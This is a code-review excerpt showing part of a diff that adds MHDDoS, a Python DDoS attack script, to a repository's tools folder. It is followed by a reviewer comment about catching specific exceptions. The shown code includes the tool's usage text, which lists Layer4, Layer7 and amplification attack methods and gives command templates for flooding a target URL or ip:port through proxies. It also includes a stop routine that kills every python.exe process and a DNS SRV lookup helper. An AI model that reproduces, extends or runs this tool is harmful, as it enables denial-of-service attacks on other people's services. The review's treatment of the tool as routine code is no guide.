tools/mhddos/start.py

```diff
@@ -0,0 +1,1194 @@
+                        )
+                    )
+
+    @staticmethod
+    def stop():
+        print("All Attacks has been Stopped !")
+        for proc in process_iter():
+            if proc.name() == "python.exe":
+                proc.kill()
+
+    @staticmethod
+    def usage():
+        print(
+            (
+                "* MHDDoS - DDoS Attack Script With %d Methods\n"
+                "Note: If the Proxy list is empty, The attack will run without proxies\n"
+                "      If the Proxy file doesn't exist, the script will download proxies and check them.\n"
+                "      Proxy Type 0 = All in config.json\n"
+                "      SocksTypes:\n"
+                "         - 6 = RANDOM\n"
+                "         - 5 = SOCKS5\n"
+                "         - 4 = SOCKS4\n"
+                "         - 1 = HTTP\n"
+                "         - 0 = ALL\n"
+                " > Methods:\n"
+                " - Layer4\n"
+                " | %s | %d Methods\n"
+                " - Layer7\n"
+                " | %s | %d Methods\n"
+                " - Tools\n"
+                " | %s | %d Methods\n"
+                " - Others\n"
+                " | %s | %d Methods\n"
+                " - All %d Methods\n"
+                "\n"
+                "Example:\n"
+                "   L7: python3 %s <method> <url> <socks_type> <threads> <proxylist> <rpc> <duration> <debug=optional>\n"
+                "   L4: python3 %s <method> <ip:port> <threads> <duration>\n"
+                "   L4 Proxied: python3 %s <method> <ip:port> <threads> <duration> <socks_type> <proxylist>\n"
+                "   L4 Amplification: python3 %s <method> <ip:port> <threads> <duration> <reflector file (only use with"
+                " Amplification)>\n"
+            )
+            % (
+                len(Methods.ALL_METHODS) + 3 + len(ToolsConsole.METHODS),
+                ", ".join(Methods.LAYER4_METHODS),
+                len(Methods.LAYER4_METHODS),
+                ", ".join(Methods.LAYER7_METHODS),
+                len(Methods.LAYER7_METHODS),
+                ", ".join(ToolsConsole.METHODS),
+                len(ToolsConsole.METHODS),
+                ", ".join(["TOOLS", "HELP", "STOP"]),
+                3,
+                len(Methods.ALL_METHODS) + 3 + len(ToolsConsole.METHODS),
+                argv[0],
+                argv[0],
+                argv[0],
+                argv[0],
+            )
+        )
+
+    # noinspection PyBroadException
+    @staticmethod
+    def ts_srv(domain):
+        records = ["_ts3._udp.", "_tsdns._tcp."]
+        DnsResolver = resolver.Resolver()
+        DnsResolver.timeout = 1
+        DnsResolver.lifetime = 1
+        Info = {}
+        for rec in records:
+            try:
+                srv_records = resolver.resolve(rec + domain, "SRV")
+                for srv in srv_records:
+                    Info[rec] = str(srv.target).rstrip(".") + ":" + str(srv.port)
+            except:
```

Comment:
It’s better to explicitly define which specific error you’re trying to catch, instead of using a broad exception or overly generic handling